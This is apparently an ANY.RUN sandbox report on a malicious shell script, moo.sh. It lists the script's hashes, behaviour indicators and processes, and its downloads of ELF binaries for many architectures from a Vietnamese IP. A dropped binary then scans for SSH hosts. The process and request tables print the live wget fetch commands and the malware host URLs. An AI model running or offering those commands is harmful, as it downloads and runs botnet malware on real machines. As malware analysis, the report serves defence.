/moo

Full analysis: https://app.any.run/tasks/88eee8fc-9a94-4f56-a65b-d9378438fc01
Verdict: Malicious activity
Analysis date: January 13, 2025, 13:44:55
OS: Ubuntu 22.04.2 LTS
Tags: scan, ssh, sshscan, telnet
Indicators:
MIME: text/x-shellscript
File info: POSIX shell script, ASCII text executable
MD5: B5209E5E8DDA8A4A1A7FBCA7F4B744C9
SHA1: C07AACD3FE9FDEC3001BB95E97BD87FA48188592
SHA256: 606BE47BFE3EC379DC8A898F8FB6DF5D1EF7C0FAE70606DE35E889B3808BC31E
SSDEEP: 48:+SnwUSn1SSnJSnCSnWSnjSnCSnPUSnlSnOSnTSnqAwhA1bAGArAvAkArAPhASAnU:+SwUS1SSJSCSWSjSCSMSlSOSTSqBhObT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Attempting to scan the network

      • dvrEncoder (PID: 38809)
    • SSHSCAN has been detected (SURICATA)

      • dvrEncoder (PID: 38809)
    • Attempting to connect via SSH

      • dvrEncoder (PID: 38809)
  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 38759)
    • Potential Corporate Privacy Violation

      • wget (PID: 38772)
      • wget (PID: 38777)
      • wget (PID: 38766)
      • wget (PID: 38782)
      • wget (PID: 38787)
      • wget (PID: 38797)
      • wget (PID: 38792)
      • wget (PID: 38803)
      • dvrEncoder (PID: 38809)
    • Connects to the server without a host name

      • wget (PID: 38772)
      • wget (PID: 38777)
      • wget (PID: 38787)
      • wget (PID: 38782)
      • wget (PID: 38792)
      • wget (PID: 38797)
      • wget (PID: 38803)
    • Executes the "rm" command to delete files or directories

      • dash (PID: 38763)
    • Uses wget to download content

      • dash (PID: 38763)
    • Gets active TCP connections

      • dash (PID: 38763)
    • Reads /proc/mounts (likely used to find writable filesystems)

      • dvrEncoder (PID: 38806)
    • Reads network configuration

      • dash (PID: 38763)
    • Connects to unusual port

      • dvrEncoder (PID: 38810)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
All screenshots are available in the full report
Total processes: 332
Monitored processes: 121
Malicious processes: 10
Suspicious processes: 3

Behavior graph

start drop and start dash no specs sudo no specs chown no specs chmod no specs sudo no specs dash no specs locale-check no specs
rm no specs wget systemctl no specs chmod no specs dash no specs
rm no specs wget chmod no specs dash no specs
rm no specs wget chmod no specs dash no specs
rm no specs wget chmod no specs dash no specs
rm no specs wget chmod no specs dash no specs
rm no specs wget chmod no specs dash no specs
rm no specs wget chmod no specs dash no specs
rm no specs wget chmod no specs o no specs dvrencoder no specs dvrencoder no specs dvrencoder no specs #SSHSCAN dvrencoder dvrencoder
rm no specs wget chmod no specs dash no specs
rm no specs wget chmod no specs dash no specs
rm no specs wget chmod no specs dash no specs
rm no specs wget no specs chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs cp no specs
rm no specs busybox chmod no specs dash no specs

Process information

PID | CMD | Path | Parent process

38758 | /bin/sh -c "sudo chown user /tmp/moo\.sh && chmod +x /tmp/moo\.sh && DISPLAY=:0 sudo -iu user /tmp/moo\.sh " | /usr/bin/dash | any-guest-agent
User: root | Integrity Level: UNKNOWN | Exit code: 0

38759 | sudo chown user /tmp/moo.sh | /usr/bin/sudo | dash
User: root | Integrity Level: UNKNOWN | Exit code: 0

38760 | chown user /tmp/moo.sh | /usr/bin/chown | sudo
User: root | Integrity Level: UNKNOWN | Exit code: 0

38761 | chmod +x /tmp/moo.sh | /usr/bin/chmod | dash
User: root | Integrity Level: UNKNOWN | Exit code: 0

38762 | sudo -iu user /tmp/moo.sh | /usr/bin/sudo | dash
User: root | Integrity Level: UNKNOWN | Exit code: 0

38763 | /bin/sh /tmp/moo.sh | /usr/bin/dash | sudo
User: user | Integrity Level: UNKNOWN | Exit code: 0

38764 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | dash
User: user | Integrity Level: UNKNOWN | Exit code: 0

38765 | rm -rf o | /usr/bin/rm | dash
User: user | Integrity Level: UNKNOWN | Exit code: 0

38766 | wget http://103.163.215.73/arm -O- | /usr/bin/wget | dash
User: user | Integrity Level: UNKNOWN | Exit code: 0

38767 | systemctl --user --global is-enabled snap.snapd-desktop-integration.snapd-desktop-integration.service | /usr/bin/systemctl | snapd
User: root | Integrity Level: UNKNOWN | Exit code: 0
Executable files: 0
Suspicious files: 9
Text files: 0
Unknown types: 0

Dropped files

PID | Process | Filename | Type
38763 | dash | /tmp/o | binary
38763 | dash | /tmp/o (deleted) | binary
38837 | cp | /tmp/busybox | binary
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 9
TCP/UDP connections: 32 325
DNS requests: 16
Threats: 130

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
– | – | GET | 204 | 91.189.91.98:80 | http://connectivity-check.ubuntu.com/ | US | – | – | whitelisted
38772 | wget | GET | 200 | 103.163.215.73:80 | http://103.163.215.73/arm5 | VN | binary | 89.8 Kb | unknown
38777 | wget | GET | 200 | 103.163.215.73:80 | http://103.163.215.73/arm6 | VN | binary | 106 Kb | unknown
38766 | wget | GET | 200 | 103.163.215.73:80 | http://103.163.215.73/arm | VN | binary | 101 Kb | unknown
38787 | wget | GET | 200 | 103.163.215.73:80 | http://103.163.215.73/mips | VN | binary | 131 Kb | unknown
38782 | wget | GET | 200 | 103.163.215.73:80 | http://103.163.215.73/arm7 | VN | binary | 119 Kb | unknown
38797 | wget | GET | 200 | 103.163.215.73:80 | http://103.163.215.73/ppc | VN | binary | 97.5 Kb | unknown
38803 | wget | GET | 200 | 103.163.215.73:80 | http://103.163.215.73/i686 | VN | binary | 91.9 Kb | unknown
38792 | wget | GET | 200 | 103.163.215.73:80 | http://103.163.215.73/mpsl | VN | binary | 133 Kb | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
– | – | 91.189.91.98:80 | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted
– | – | 212.102.56.178:443 | odrs.gnome.org | Datacamp Limited | DE | whitelisted
484 | avahi-daemon | 224.0.0.251:5353 | – | – | – | unknown
512 | snapd | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
512 | snapd | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
512 | snapd | 185.125.188.55:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
512 | snapd | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
38766 | wget | 103.163.215.73:80 | – | Lanit Technology and Communication Joint Stock Company | VN | unknown
38772 | wget | 103.163.215.73:80 | – | Lanit Technology and Communication Joint Stock Company | VN | unknown
38777 | wget | 103.163.215.73:80 | – | Lanit Technology and Communication Joint Stock Company | VN | unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
whitelisted
odrs.gnome.org
whitelisted
google.com
  • 216.58.206.78
  • 2a00:1450:4001:80e::200e
whitelisted
api.snapcraft.io
whitelisted
46.100.168.192.in-addr.arpa
unknown
ai.stackoverflow.libre
unknown

Threats

PID | Process | Class | Message
38766 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
38772 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
38777 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
38782 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
38787 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
38792 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
38797 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
38803 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download Over HTTP
38810 | dvrEncoder | Potentially Bad Traffic | ET HUNTING Observed DNS Query for OpenNIC Alternative DNS TLD (.libre)
38809 | dvrEncoder | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Attempting to SSH scan external network
No debug info